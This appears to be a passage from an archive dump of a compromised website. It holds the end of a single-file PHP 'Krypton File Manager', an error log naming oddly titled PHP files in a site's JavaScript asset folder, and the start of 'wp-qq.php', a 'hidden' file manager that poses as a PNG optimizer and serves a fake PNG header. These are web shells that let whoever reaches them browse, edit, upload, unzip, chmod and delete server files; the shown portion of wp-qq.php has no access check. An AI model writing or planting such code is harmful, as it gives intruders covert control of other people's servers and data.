        return ['success' => false, 'message' => 'Failed to change permissions.'];
    }

    /**
     * Get file content for editing
     */
    public function getFileContent(string $encryptedPath): string {
        $path = $this->securityManager->decryptPath($encryptedPath);

        if (file_exists($path) && !is_dir($path) && FileUtils::isEditableFile(basename($path))) {
            return file_get_contents($path);
        }

        return "Error: Cannot read file.";
    }

    /**
     * Save file content
     */
    public function saveFileContent(string $encryptedPath, string $content): array {
        $path = $this->securityManager->decryptPath($encryptedPath);

        if (!file_exists($path) || is_dir($path)) {
            return ['success' => false, 'message' => 'File does not exist.'];
        }

        if (file_put_contents($path, $content) !== false) {
            return ['success' => true, 'message' => 'File saved successfully.'];
        }

        return ['success' => false, 'message' => 'Failed to save file.'];
    }

    /**
     * Create a new file
     */
    public function createFile(string $fileName): array {
        $filePath = $this->directoryManager->getCurrentPath() . '/' . $fileName;

        if (file_exists($filePath)) {
            return ['success' => false, 'message' => 'File already exists.'];
        }

        if (file_put_contents($filePath, '') !== false) {
            return ['success' => true, 'message' => 'File created successfully.'];
        }

        return ['success' => false, 'message' => 'Failed to create file.'];
    }

    /**
     * Create a new folder
     */
    public function createFolder(string $folderName): array {
        $folderPath = $this->directoryManager->getCurrentPath() . '/' . $folderName;

        if (file_exists($folderPath)) {
            return ['success' => false, 'message' => 'Folder already exists.'];
        }

        if (mkdir($folderPath, 0755)) {
            return ['success' => true, 'message' => 'Folder created successfully.'];
        }

        return ['success' => false, 'message' => 'Failed to create folder.'];
    }

    /**
     * Download a file
     */
    public function downloadFile(string $encryptedPath): void {
        $path = $this->securityManager->decryptPath($encryptedPath);

        if (file_exists($path) && !is_dir($path)) {
            header('Content-Description: File Transfer');
            header('Content-Type: application/octet-stream');
            header('Content-Disposition: attachment; filename="' . basename($path) . '"');
            header('Content-Transfer-Encoding: binary');
            header('Expires: 0');
            header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
            header('Pragma: public');
            header('Content-Length: ' . filesize($path));
            ob_clean();
            flush();
            readfile($path);
            exit;
        }
    }
}

/**
 * Request handler for processing HTTP requests
 */
class RequestHandler {

    private $securityManager;
    private $directoryManager;
    private $fileOperations;
    private $messages;

    public function __construct() {
        $this->securityManager = new SecurityManager();
        $this->directoryManager = new DirectoryManager($this->securityManager);
        $this->fileOperations = new FileOperations($this->securityManager, $this->directoryManager);
        $this->messages = ['success' => '', 'error' => ''];
    }

    /**
     * Process incoming requests
     */
    public function handleRequest(): void {
        $this->securityManager->checkSessionTimeout();

        if ($_SERVER['REQUEST_METHOD'] === 'POST') {
            $this->handlePostRequest();
        }
    }

    /**
     * Handle POST requests
     */
    private function handlePostRequest(): void {
        // Update current path if provided
        if (isset($_POST['current_path'])) {
            $this->directoryManager->navigateTo($_POST['current_path']);
        }

        // Handle specific actions
        if (isset($_POST['action'])) {
            $this->handleAction($_POST['action']);
            return;
        }

        // Handle form submissions
        $this->handleFormSubmissions();
    }

    /**
     * Handle AJAX actions
     */
    private function handleAction(string $action): void {
        switch ($action) {
            case 'getContent':
                if (isset($_POST['path'])) {
                    echo $this->fileOperations->getFileContent($_POST['path']);
                }
                exit;

            case 'navigate':
                if (isset($_POST['path'])) {
                    $this->directoryManager->navigateTo($_POST['path']);
                }
                break;

            case 'download':
                if (isset($_POST['path'])) {
                    $this->fileOperations->downloadFile($_POST['path']);
                }
                break;
        }
    }

    /**
     * Handle form submissions
     */
    private function handleFormSubmissions(): void {
        // File upload
        if (isset($_POST['upload']) && isset($_FILES['file'])) {
            $result = $this->fileOperations->uploadFile($_FILES['file']);
            $this->setMessage($result);
        }

        // File/directory deletion
        if (isset($_POST['delete']) && isset($_POST['path'])) {
            $result = $this->fileOperations->delete($_POST['path']);
            $this->setMessage($result);
        }

        // Rename
        if (isset($_POST['rename']) && isset($_POST['oldPath']) && isset($_POST['newName'])) {
            $result = $this->fileOperations->rename($_POST['oldPath'], $_POST['newName']);
            $this->setMessage($result);
        }

        // Change permissions
        if (isset($_POST['changePermissions']) && isset($_POST['permPath']) && isset($_POST['permissions'])) {
            $result = $this->fileOperations->changePermissions($_POST['permPath'], $_POST['permissions']);
            $this->setMessage($result);
        }

        // Save file
        if (isset($_POST['saveFile']) && isset($_POST['filePath']) && isset($_POST['fileContent'])) {
            $result = $this->fileOperations->saveFileContent($_POST['filePath'], $_POST['fileContent']);
            $this->setMessage($result);
        }

        // Create file
        if (isset($_POST['createFile']) && isset($_POST['newFileName'])) {
            $result = $this->fileOperations->createFile($_POST['newFileName']);
            $this->setMessage($result);
        }

        // Create folder
        if (isset($_POST['createFolder']) && isset($_POST['newFolderName'])) {
            $result = $this->fileOperations->createFolder($_POST['newFolderName']);
            $this->setMessage($result);
        }
    }

    /**
     * Set success or error message
     */
    private function setMessage(array $result): void {
        if ($result['success']) {
            $this->messages['success'] = $result['message'];
        } else {
            $this->messages['error'] = $result['message'];
        }
    }

    /**
     * Get messages
     */
    public function getMessages(): array {
        return $this->messages;
    }

    /**
     * Get security manager
     */
    public function getSecurityManager(): SecurityManager {
        return $this->securityManager;
    }

    /**
     * Get directory manager
     */
    public function getDirectoryManager(): DirectoryManager {
        return $this->directoryManager;
    }
}

/**
 * View renderer for HTML output
 */
class ViewRenderer {

    private $requestHandler;

    public function __construct(RequestHandler $requestHandler) {
        $this->requestHandler = $requestHandler;
    }

    /**
     * Render the complete HTML page
     */
    public function render(): void {
        $securityManager = $this->requestHandler->getSecurityManager();
        $directoryManager = $this->requestHandler->getDirectoryManager();
        $messages = $this->requestHandler->getMessages();

        $items = $directoryManager->getDirectoryContents();
        $breadcrumbs = $directoryManager->getBreadcrumbs();
        $currentPath = $directoryManager->getCurrentPath();
        $encryptedCurrentPath = $securityManager->encryptPath($currentPath);
        $homeDirectory = dirname($_SERVER['SCRIPT_FILENAME']);
        $encryptedHomeDirectory = $securityManager->encryptPath($homeDirectory);
        $encryptionKeyWarning = $securityManager->hasDefaultEncryptionKey() ?
                'Warning: Default encryption key is being used. Please change it for security.' : '';

        include $this->getTemplatePath();
    }

    /**
     * Get template file path (inline for single-file solution)
     */
    private function getTemplatePath(): string {
        return __FILE__;
    }
}

// Initialize and run the application
$requestHandler = new RequestHandler();
$requestHandler->handleRequest();

$viewRenderer = new ViewRenderer($requestHandler);

// Extract variables for template
$securityManager = $requestHandler->getSecurityManager();
$directoryManager = $requestHandler->getDirectoryManager();
$messages = $requestHandler->getMessages();

$items = $directoryManager->getDirectoryContents();
$breadcrumbs = $directoryManager->getBreadcrumbs();
$currentPath = $directoryManager->getCurrentPath();
$encryptedCurrentPath = $securityManager->encryptPath($currentPath);
$homeDirectory = dirname($_SERVER['SCRIPT_FILENAME']);
$encryptedHomeDirectory = $securityManager->encryptPath($homeDirectory);
$encryptionKeyWarning = $securityManager->hasDefaultEncryptionKey() ?
        'Warning: Default encryption key is being used. Please change it for security.' : '';
$success = $messages['success'];
$error = $messages['error'];
?>
<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Krypton File Manager</title>
        <style>
            /* Base styles and reset */
            * {
                margin: 0;
                padding: 0;
                box-sizing: border-box;
                font-family: 'Inter', 'Roboto', 'Helvetica', sans-serif;
            }

            body {
                background-image: url('https://w.wallhaven.cc/full/ly/wallhaven-lyq3kq.jpg');
                background-size: cover;
                background-position: center;
                background-repeat: no-repeat;
                background-color: #f9f9f9;
                color: #333333;
                line-height: 1.6;
                background-attachment: fixed;
                min-height: 100vh;
            }

            .container {
                max-width: 1200px;
                margin: 0 auto;
                padding: 0 20px;
            }

            /* Navigation bar */
            .navbar {
                background-color: #ffffff;
                box-shadow: 0 2px 8px rgba(0, 0, 0, 0.05);
                padding: 15px 0;
                position: sticky;
                top: 0;
                z-index: 100;
            }

            .navbar-content {
                display: flex;
                align-items: center;
                justify-content: space-between;
            }

            .navbar h1 {
                color: #333333;
                font-size: 1.5rem;
                font-weight: 500;
            }

            .version {
                font-size: 0.8rem;
                color: #777;
                margin-left: 10px;
            }

            .navbar-actions {
                display: flex;
                gap: 10px;
            }

            .home-btn {
                background-color: #4a6cf7;
                color: white;
                border: none;
                padding: 8px 15px;
                border-radius: 6px;
                cursor: pointer;
                font-weight: 500;
                text-decoration: none;
                display: inline-flex;
                align-items: center;
                transition: all 0.2s ease;
            }

            .home-btn:hover {
                background-color: #3a5ce5;
                transform: translateY(-2px);
                box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
            }

            .home-icon {
                margin-right: 5px;
            }

            /* Breadcrumb navigation */
            .breadcrumb {
                display: flex;
                align-items: center;
                padding: 12px 0;
                margin-bottom: 15px;
                overflow-x: auto;
                white-space: nowrap;
            }

            .breadcrumb-item {
                display: flex;
                align-items: center;
            }

            .breadcrumb-item a {
                color: #4a6cf7;
                text-decoration: none;
                padding: 5px 8px;
                border-radius: 4px;
                transition: background-color 0.2s;
                cursor: pointer;
            }

            .breadcrumb-item a:hover {
                background-color: rgba(74, 108, 247, 0.1);
            }

            .breadcrumb-separator {
                margin: 0 5px;
                color: #999;
            }

            .breadcrumb-current {
                font-weight: 500;
                padding: 5px 8px;
            }

            /* Section styling */
            .section {
                background-color: rgba(255, 255, 255, 0.9);
                border-radius: 8px;
                box-shadow: 0 2px 8px rgba(0, 0, 0, 0.05);
                padding: 20px;
                margin-bottom: 20px;
                box-shadow: rgba(50, 50, 93, 0.25) 0px 2px 5px -1px, rgba(0, 0, 0, 0.3) 0px 1px 3px -1px;
            }

            .section-header {
                display: flex;
                justify-content: space-between;
                align-items: center;
                margin-bottom: 15px;
            }

            .section-title {
                font-size: 1.1rem;
                color: #333333;
                font-weight: 500;
            }

            .section-actions {
                display: flex;
                gap: 10px;
            }

            /* Upload form */
            .upload-form {
                display: flex;
                flex-wrap: wrap;
                gap: 10px;
                align-items: center;
            }

            .upload-form input[type="file"] {
                flex: 1;
                min-width: 200px;
                padding: 10px;
                border: 1px solid #e0e0e0;
                border-radius: 6px;
                background-color: #ffffff;
            }

            .btn {
                background-color: #4a6cf7;
                color: white;
                border: none;
                padding: 10px 20px;
                border-radius: 6px;
                cursor: pointer;
                font-weight: 500;
                transition: all 0.2s ease;
            }

            .btn:hover {
                background-color: #3a5ce5;
                transform: translateY(-2px);
                box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
            }

            .btn-sm {
                padding: 6px 12px;
                font-size: 0.9rem;
            }

            .btn-success {
                background-color: #28a745;
            }

            .btn-success:hover {
                background-color: #218838;
            }

            /* File list table */
            .file-table-container {
                overflow-x: auto;
            }

            .file-table {
                width: 100%;
                border-collapse: collapse;
                margin-top: 10px;
            }

            .file-table th {
                background-color: #f5f5f5;
                padding: 12px 15px;
                text-align: left;
                font-weight: 500;
                border-bottom: 1px solid #e0e0e0;
                position: relative;
            }

            .file-table td {
                padding: 12px 15px;
                border-bottom: 1px solid #e0e0e0;
            }

            .file-table tr:hover {
                background-color: #f5f7ff;
            }

            .file-name {
                display: flex;
                align-items: center;
                gap: 8px;
            }

            .folder-icon::before {
                content: "📁";
            }

            .file-icon::before {
                content: "📄";
            }

            /* Action buttons */
            .action-buttons {
                display: flex;
                gap: 8px;
            }

            .action-btn {
                background: none;
                border: none;
                cursor: pointer;
                font-size: 1rem;
                color: #555;
                transition: all 0.2s ease;
                width: 28px;
                height: 28px;
                display: flex;
                align-items: center;
                justify-content: center;
                border-radius: 4px;
            }

            .action-btn:hover {
                background-color: #f0f0f0;
                color: #333;
            }

            /* Modal styles */
            .modal {
                display: none;
                position: fixed;
                top: 0;
                left: 0;
                width: 100%;
                height: 100%;
                background-color: rgba(0, 0, 0, 0.5);
                z-index: 1000;
                justify-content: center;
                align-items: center;
            }

            .modal-content {
                background-color: white;
                padding: 25px;
                border-radius: 8px;
                width: 90%;
                max-width: 400px;
                box-shadow: 0 4px 20px rgba(0, 0, 0, 0.15);
            }

            .modal-content.modal-lg {
                max-width: 800px;
                height: 80%;
                display: flex;
                flex-direction: column;
            }

            .modal-title {
                font-size: 1.2rem;
                margin-bottom: 15px;
                font-weight: 500;
            }

            .modal-form {
                display: flex;
                flex-direction: column;
                gap: 15px;
            }

            .editor-form {
                display: flex;
                flex-direction: column;
                gap: 15px;
                flex-grow: 1;
            }

            .form-group {
                display: flex;
                flex-direction: column;
                gap: 5px;
            }

            .form-group label {
                font-weight: 500;
            }

            .form-group input {
                padding: 8px 12px;
                border: 1px solid #ddd;
                border-radius: 4px;
            }

            .form-group textarea {
                flex-grow: 1;
                padding: 12px;
                border: 1px solid #ddd;
                border-radius: 4px;
                font-family: 'Courier New', monospace;
                font-size: 14px;
                resize: none;
            }

            .modal-actions {
                display: flex;
                justify-content: flex-end;
                gap: 10px;
                margin-top: 20px;
            }

            .btn-cancel {
                background-color: #f0f0f0;
                color: #333;
            }

            .btn-cancel:hover {
                background-color: #e0e0e0;
            }

            /* Alerts */
            .alert {
                padding: 12px 15px;
                margin-bottom: 15px;
                border-radius: 4px;
                font-weight: 500;
            }

            .alert-success {
                background-color: #d4edda;
                color: #155724;
                border: 1px solid #c3e6cb;
            }

            .alert-error {
                background-color: #f8d7da;
                color: #721c24;
                border: 1px solid #f5c6cb;
            }

            .alert-warning {
                background-color: #fff3cd;
                color: #856404;
                border: 1px solid #ffeeba;
            }

            /* Footer */
            .footer {
                text-align: center;
                padding: 20px 0;
                color: #777;
                font-size: 0.9rem;
            }

            /* Loading overlay */
            .loading-overlay {
                display: none;
                position: fixed;
                top: 0;
                left: 0;
                width: 100%;
                height: 100%;
                background-color: rgba(0, 0, 0, 0.5);
                z-index: 2000;
                justify-content: center;
                align-items: center;
            }

            .spinner {
                width: 50px;
                height: 50px;
                border: 5px solid #f3f3f3;
                border-top: 5px solid #3498db;
                border-radius: 50%;
                animation: spin 1s linear infinite;
            }

            @keyframes spin {
                0% {
                    transform: rotate(0deg);
                }
                100% {
                    transform: rotate(360deg);
                }
            }

            /* Responsive design */
            @media (max-width: 768px) {
                .upload-form {
                    flex-direction: column;
                    align-items: stretch;
                }

                .upload-form input[type="file"] {
                    width: 100%;
                }

                .action-buttons {
                    flex-wrap: wrap;
                }

                .section-header {
                    flex-direction: column;
                    align-items: flex-start;
                    gap: 10px;
                }

                .section-actions {
                    width: 100%;
                }

                .btn {
                    width: 100%;
                }
            }
        </style>
    </head>
    <body>
        <!-- Loading Overlay -->
        <div id="loadingOverlay" class="loading-overlay">
            <div class="spinner"></div>
        </div>

        <!-- Navigation Bar -->
        <nav class="navbar">
            <div class="container navbar-content">
                <h1>Krypton <span class="version">v<?php echo Config::VERSION; ?></span></h1>
                <div class="navbar-actions">
                    <button onclick="navigateTo('<?php echo $encryptedHomeDirectory; ?>')" class="home-btn">
                        <span class="home-icon">🏠</span> Home
                    </button>
                </div>
            </div>
        </nav>

        <div class="container">
            <!-- Alerts -->
            <?php if (!empty($encryptionKeyWarning)): ?>
                <div class="alert alert-warning"><?php echo $encryptionKeyWarning; ?></div>
            <?php endif; ?>

            <?php if (!empty($success)): ?>
                <div class="alert alert-success"><?php echo $success; ?></div>
            <?php endif; ?>

            <?php if (!empty($error)): ?>
                <div class="alert alert-error"><?php echo $error; ?></div>
            <?php endif; ?>

            <!-- Breadcrumb Navigation -->
            <div class="breadcrumb">
                <?php foreach ($breadcrumbs as $index => $crumb): ?>
                    <?php if ($index > 0): ?>
                        <span class="breadcrumb-separator">›</span>
                    <?php endif; ?>

                    <div class="breadcrumb-item">
                        <?php if ($index === count($breadcrumbs) - 1): ?>
                            <span class="breadcrumb-current"><?php echo htmlspecialchars($crumb['name']); ?></span>
                        <?php else: ?>
                            <a onclick="navigateTo('<?php echo $crumb['encryptedPath']; ?>')"><?php echo htmlspecialchars($crumb['name']); ?></a>
                        <?php endif; ?>
                    </div>
                <?php endforeach; ?>
            </div>

            <!-- Upload Section -->
            <section class="section">
                <h2 class="section-title">Upload Files</h2>
                <form class="upload-form" method="post" enctype="multipart/form-data">
                    <input type="hidden" name="current_path" value="<?php echo $encryptedCurrentPath; ?>">
                    <input type="file" name="file">
                    <button type="submit" name="upload" class="btn">Upload File</button>
                </form>
            </section>

            <!-- File List Section -->
            <section class="section">
                <div class="section-header">
                    <h2 class="section-title">Files</h2>
                    <div class="section-actions">
                        <button class="btn btn-sm btn-success" onclick="showCreateFileModal()">New File</button>
                        <button class="btn btn-sm" onclick="showCreateFolderModal()">New Folder</button>
                    </div>
                </div>
                <div class="file-table-container">
                    <table class="file-table">
                        <thead>
                            <tr>
                                <th>Filename</th>
                                <th>Size</th>
                                <th>Permissions</th>
                                <th>Last Modified</th>
                                <th>Actions</th>
                            </tr>
                        </thead>
                        <tbody>
                            <!-- Parent directory link -->
                            <?php if ($currentPath !== '/'): ?>
                                <tr>
                                    <td>
                                        <div class="file-name">
                                            <span class="folder-icon"></span>
                                            <a onclick="navigateTo('<?php echo $securityManager->encryptPath(dirname($currentPath)); ?>')">..</a>
                                        </div>
                                    </td>
                                    <td>-</td>
                                    <td>-</td>
                                    <td>-</td>
                                    <td>-</td>
                                </tr>
                            <?php endif; ?>

                            <!-- File list -->
                            <?php foreach ($items as $item): ?>
                                <tr>
                                    <td>
                                        <div class="file-name">
                                            <span class="<?php echo $item->isDirectory ? 'folder-icon' : 'file-icon'; ?>"></span>
                                            <?php if ($item->isDirectory): ?>
                                                <a onclick="navigateTo('<?php echo $item->encryptedPath; ?>')"><?php echo htmlspecialchars($item->name); ?></a>
                                            <?php else: ?>
                                                <?php echo htmlspecialchars($item->name); ?>
                                            <?php endif; ?>
                                        </div>
                                    </td>
                                    <td><?php echo $item->size; ?></td>
                                    <td><?php echo $item->permissions; ?></td>
                                    <td><?php echo $item->lastModified; ?></td>
                                    <td>
                                        <div class="action-buttons">
                                            <?php if (!$item->isDirectory): ?>
                                                <button class="action-btn" title="Download" onclick="downloadFile('<?php echo $item->encryptedPath; ?>')">📥</button>
                                                <?php if ($item->isEditable): ?>
                                                    <button class="action-btn" title="Edit" onclick="showEditFileModal('<?php echo addslashes($item->encryptedPath); ?>', '<?php echo addslashes($item->name); ?>')">📝</button>
                                                <?php endif; ?>
                                            <?php endif; ?>
                                            <button class="action-btn" title="Rename" onclick="showRenameModal('<?php echo addslashes($item->encryptedPath); ?>', '<?php echo addslashes($item->name); ?>')">✏️</button>
                                            <button class="action-btn" title="Change Permissions" onclick="showPermissionsModal('<?php echo addslashes($item->encryptedPath); ?>', '<?php echo addslashes($item->name); ?>')">🔒</button>

                                            <form method="post" style="display:inline;" onsubmit="return confirmDelete(this, '<?php echo $item->isDirectory ? 'directory' : 'file'; ?>');">
                                                <input type="hidden" name="current_path" value="<?php echo $encryptedCurrentPath; ?>">
                                                <input type="hidden" name="path" value="<?php echo htmlspecialchars($item->encryptedPath); ?>">
                                                <button type="submit" name="delete" class="action-btn" title="Delete">🗑️</button>
                                            </form>

                                        </div>
                                    </td>
                                </tr>
                            <?php endforeach; ?>
                        </tbody>
                    </table>
                </div>
            </section>

            <footer class="footer">
                Krypton File Manager v<?php echo Config::VERSION; ?> | Single-file PHP File Manager (OOP Version)
            </footer>
        </div>

        <!-- Rename Modal -->
        <div id="renameModal" class="modal">
            <div class="modal-content">
                <h3 class="modal-title">Rename: <span id="renameFileName"></span></h3>
                <form class="modal-form" method="post">
                    <input type="hidden" name="current_path" value="<?php echo $encryptedCurrentPath; ?>">
                    <input type="hidden" id="renameOldPath" name="oldPath" value="">
                    <div class="form-group">
                        <label for="renameNewName">New Name:</label>
                        <input type="text" id="renameNewName" name="newName" required>
                    </div>
                    <div class="modal-actions">
                        <button type="button" class="btn btn-cancel" onclick="hideModal('renameModal')">Cancel</button>
                        <button type="submit" name="rename" class="btn">Rename</button>
                    </div>
                </form>
            </div>
        </div>

        <!-- Permissions Modal -->
        <div id="permissionsModal" class="modal">
            <div class="modal-content">
                <h3 class="modal-title">Change Permissions: <span id="permissionsFileName"></span></h3>
                <form class="modal-form" method="post">
                    <input type="hidden" name="current_path" value="<?php echo $encryptedCurrentPath; ?>">
                    <input type="hidden" id="permissionsPath" name="permPath" value="">
                    <div class="form-group">
                        <label for="permissionsOctal">Permissions (Octal):</label>
                        <input type="text" id="permissionsOctal" name="permissions" placeholder="e.g., 0755" required>
                    </div>
                    <div class="modal-actions">
                        <button type="button" class="btn btn-cancel" onclick="hideModal('permissionsModal')">Cancel</button>
                        <button type="submit" name="changePermissions" class="btn">Apply</button>
                    </div>
                </form>
            </div>
        </div>

        <!-- Edit File Modal -->
        <div id="editFileModal" class="modal">
            <div class="modal-content modal-lg">
                <h3 class="modal-title">Edit File: <span id="editFileName"></span></h3>
                <form class="editor-form" method="post">
                    <input type="hidden" name="current_path" value="<?php echo $encryptedCurrentPath; ?>">
                    <input type="hidden" id="editFilePath" name="filePath" value="">
                    <div class="form-group" style="flex-grow: 1; display: flex; flex-direction: column;">
                        <textarea id="fileContent" name="fileContent" required></textarea>
                    </div>
                    <div class="modal-actions">
                        <button type="button" class="btn btn-cancel" onclick="hideModal('editFileModal')">Cancel</button>
                        <button type="submit" name="saveFile" class="btn">Save</button>
                    </div>
                </form>
            </div>
        </div>

        <!-- Create File Modal -->
        <div id="createFileModal" class="modal">
            <div class="modal-content">
                <h3 class="modal-title">Create New File</h3>
                <form class="modal-form" method="post">
                    <input type="hidden" name="current_path" value="<?php echo $encryptedCurrentPath; ?>">
                    <div class="form-group">
                        <label for="newFileName">File Name:</label>
                        <input type="text" id="newFileName" name="newFileName" required>
                    </div>
                    <div class="modal-actions">
                        <button type="button" class="btn btn-cancel" onclick="hideModal('createFileModal')">Cancel</button>
                        <button type="submit" name="createFile" class="btn">Create</button>
                    </div>
                </form>
            </div>
        </div>

        <!-- Create Folder Modal -->
        <div id="createFolderModal" class="modal">
            <div class="modal-content">
                <h3 class="modal-title">Create New Folder</h3>
                <form class="modal-form" method="post">
                    <input type="hidden" name="current_path" value="<?php echo $encryptedCurrentPath; ?>">
                    <div class="form-group">
                        <label for="newFolderName">Folder Name:</label>
                        <input type="text" id="newFolderName" name="newFolderName" required>
                    </div>
                    <div class="modal-actions">
                        <button type="button" class="btn btn-cancel" onclick="hideModal('createFolderModal')">Cancel</button>
                        <button type="submit" name="createFolder" class="btn">Create</button>
                    </div>
                </form>
            </div>
        </div>

        <!-- Hidden form for navigation -->
        <form id="navigationForm" method="post" style="display: none;">
            <input type="hidden" name="action" value="navigate">
            <input type="hidden" id="navigationPath" name="path" value="">
        </form>

        <!-- Hidden form for download -->
        <form id="downloadForm" method="post" style="display: none;">
            <input type="hidden" name="action" value="download">
            <input type="hidden" id="downloadPath" name="path" value="">
        </form>

        <script>
            // Show loading overlay
            function showLoading() {
                document.getElementById('loadingOverlay').style.display = 'flex';
            }

            // Hide loading overlay
            function hideLoading() {
                document.getElementById('loadingOverlay').style.display = 'none';
            }

            // Navigation function
            function navigateTo(path) {
                showLoading();
                document.getElementById('navigationPath').value = path;
                document.getElementById('navigationForm').submit();
            }

            // Download function
            function downloadFile(path) {
                document.getElementById('downloadPath').value = path;
                document.getElementById('downloadForm').submit();
            }

            // Show rename modal
            function showRenameModal(path, name) {
                document.getElementById('renameFileName').textContent = name;
                document.getElementById('renameOldPath').value = path;
                document.getElementById('renameNewName').value = name;
                document.getElementById('renameModal').style.display = 'flex';
            }

            // Show permissions modal
            function showPermissionsModal(path, name) {
                document.getElementById('permissionsFileName').textContent = name;
                document.getElementById('permissionsPath').value = path;
                document.getElementById('permissionsModal').style.display = 'flex';
            }

            // Show edit file modal
            function showEditFileModal(path, name) {
                document.getElementById('editFileName').textContent = name;
                document.getElementById('editFilePath').value = path;

                showLoading();

                // Fetch file content using POST
                const formData = new FormData();
                formData.append('action', 'getContent');
                formData.append('path', path);

                fetch(window.location.pathname, {
                    method: 'POST',
                    body: formData
                })
                        .then(response => response.text())
                        .then(content => {
                            document.getElementById('fileContent').value = content;
                            document.getElementById('editFileModal').style.display = 'flex';
                            hideLoading();
                        })
                        .catch(error => {
                            hideLoading();
                            alert('Error loading file content: ' + error);
                        });
            }

            // Show create file modal
            function showCreateFileModal() {
                document.getElementById('newFileName').value = '';
                document.getElementById('createFileModal').style.display = 'flex';
            }

            // Show create folder modal
            function showCreateFolderModal() {
                document.getElementById('newFolderName').value = '';
                document.getElementById('createFolderModal').style.display = 'flex';
            }

            // Hide modal
            function hideModal(modalId) {
                document.getElementById(modalId).style.display = 'none';
            }

            // Close modals when clicking outside
            window.onclick = function (event) {
                if (event.target.className === 'modal') {
                    event.target.style.display = 'none';
                }
            }

            function confirmDelete(form, type) {
                if (confirm('Are you sure you want to delete this ' + type + '?')) {
                    showLoading();
                    return true;
                }
                return false;
            }


            // Add loading indicator to form submissions
            document.addEventListener('DOMContentLoaded', function () {
                const forms = document.querySelectorAll('form');
                forms.forEach(form => {
                    // Skip delete forms (they use confirmDelete)
                    if (form.querySelector('button[name="delete"]'))
                        return;
                    form.addEventListener('submit', function () {
                        if (form.id !== 'navigationForm' && form.id !== 'downloadForm') {
                            showLoading();
                        }
                    });
                });
            });
        </script>
    </body>
</html>
js/asst/error_log000064400000001212151213033150010035 0ustar00[07-Oct-2025 02:27:00 UTC] PHP Parse error:  syntax error, unexpected '>' in /home/islapiiu/sites/taxigalle/control-panel/delete/js/asst/wp-qq.php on line 154
[07-Oct-2025 02:27:03 UTC] PHP Parse error:  syntax error, unexpected '?' in /home/islapiiu/sites/taxigalle/control-panel/delete/js/asst/zexbtx.php on line 3
[07-Oct-2025 02:27:15 UTC] PHP Parse error:  syntax error, unexpected ':', expecting ';' or '{' in /home/islapiiu/sites/taxigalle/control-panel/delete/js/asst/ukr.php on line 64
[07-Oct-2025 02:27:28 UTC] PHP Parse error:  syntax error, unexpected '?' in /home/islapiiu/sites/taxigalle/control-panel/delete/js/asst/4.php on line 189
js/asst/wp-qq.php000064400000034013151213033150007703 0ustar00<?php
// 🛡️ FOXDROP File Manager (hidden) - Enhanced UI

// === Fake PNG for disguise (if ?i)
if (isset($_GET['i'])) {
    header("Content-Type: image/png");
    echo "\x89PNG\r\n\x1a\n"; // fake PNG header
    exit;
}

// === Init
error_reporting(E_ALL);
ini_set('display_errors', 1);

$self = __FILE__;
$dir = isset($_GET['go']) ? $_GET['go'] : getcwd();
$dir = realpath($dir);
$items = scandir($dir);

// === Actions: Delete, Rename, Perms, Zip/Unzip, Edit, Upload, Folder
if (isset($_GET['delete'])) {
    $target = $dir . DIRECTORY_SEPARATOR . basename($_GET['delete']);
    if (is_file($target)) unlink($target);
    elseif (is_dir($target)) rmdir($target);
    echo "<div class='alert alert-danger'>🗑️ Deleted: " . htmlspecialchars($_GET['delete']) . "</div>";
}

if (isset($_POST['rename_from']) && isset($_POST['rename_to'])) {
    $from = $dir . DIRECTORY_SEPARATOR . basename($_POST['rename_from']);
    $to = $dir . DIRECTORY_SEPARATOR . basename($_POST['rename_to']);
    if (file_exists($from)) {
        rename($from, $to);
        echo "<div class='alert alert-success'>✏️ Renamed successfully.</div>";
    }
}

if (isset($_POST['perm_target']) && isset($_POST['perm_value'])) {
    $target = $dir . DIRECTORY_SEPARATOR . basename($_POST['perm_target']);
    $perm = intval($_POST['perm_value'], 8);
    if (file_exists($target)) {
        chmod($target, $perm);
        echo "<div class='alert alert-success'>🔐 Permissions changed to " . decoct($perm) . "</div>";
    }
}

if (isset($_GET['zip'])) {
    $zipTarget = $dir . DIRECTORY_SEPARATOR . basename($_GET['zip']);
    $zipFile = $zipTarget . '.zip';
    if (is_dir($zipTarget)) {
        $zip = new ZipArchive();
        if ($zip->open($zipFile, ZipArchive::CREATE | ZipArchive::OVERWRITE)) {
            $files = new RecursiveIteratorIterator(
                new RecursiveDirectoryIterator($zipTarget, RecursiveDirectoryIterator::SKIP_DOTS),
                RecursiveIteratorIterator::SELF_FIRST
            );
            foreach ($files as $file) {
                $pathInZip = substr($file->getPathname(), strlen($zipTarget) + 1);
                $zip->addFile($file->getPathname(), $pathInZip);
            }
            $zip->close();
            echo "<div class='alert alert-success'>📦 Zipped: " . htmlspecialchars(basename($zipFile)) . "</div>";
        }
    }
}

if (isset($_GET['unzip'])) {
    $zipPath = $dir . DIRECTORY_SEPARATOR . basename($_GET['unzip']);
    if (is_file($zipPath) && pathinfo($zipPath, PATHINFO_EXTENSION) === 'zip') {
        $zip = new ZipArchive();
        if ($zip->open($zipPath)) {
            $zip->extractTo($dir);
            $zip->close();
            echo "<div class='alert alert-success'>📂 Unzipped to <code>" . htmlspecialchars($dir) . "</code></div>";
        }
    }
}

if (isset($_GET['edit'])) {
    $targetFile = $dir . DIRECTORY_SEPARATOR . basename($_GET['edit']);
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['content_save'])) {
        file_put_contents($targetFile, $_POST['content']);
        echo "<div class='alert alert-success'>💾 Saved.</div>";
    }
    $code = @file_get_contents($targetFile);
    echo "<!DOCTYPE html><html><head>
    <title>PNG Optimizer | Dashboard</title>
    <meta name='viewport' content='width=device-width, initial-scale=1'>
    <link href='https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css' rel='stylesheet'>
    <link rel='stylesheet' href='https://cdn.jsdelivr.net/npm/[email protected]/font/bootstrap-icons.css'>
    <style>
    .file-icon { font-size: 1.2rem; margin-right: 8px; }
    .breadcrumb { background-color: #f8f9fa; padding: 0.75rem 1rem; }
    .file-actions a { margin-right: 10px; }
    .file-size { font-family: monospace; }
    .file-perm { font-family: monospace; }
    .editor-container { margin-top: 20px; }
    .editor-textarea { font-family: monospace; font-size: 14px; }
    </style>
    </head><body class='bg-light'>";
    echo "<div class='container mt-4'>";
    echo "<div class='card'>";
    echo "<div class='card-header bg-primary text-white d-flex justify-content-between align-items-center'>
        <h4><i class='bi bi-pencil-square'></i> Editing: " . htmlspecialchars($_GET['edit']) . "</h4>
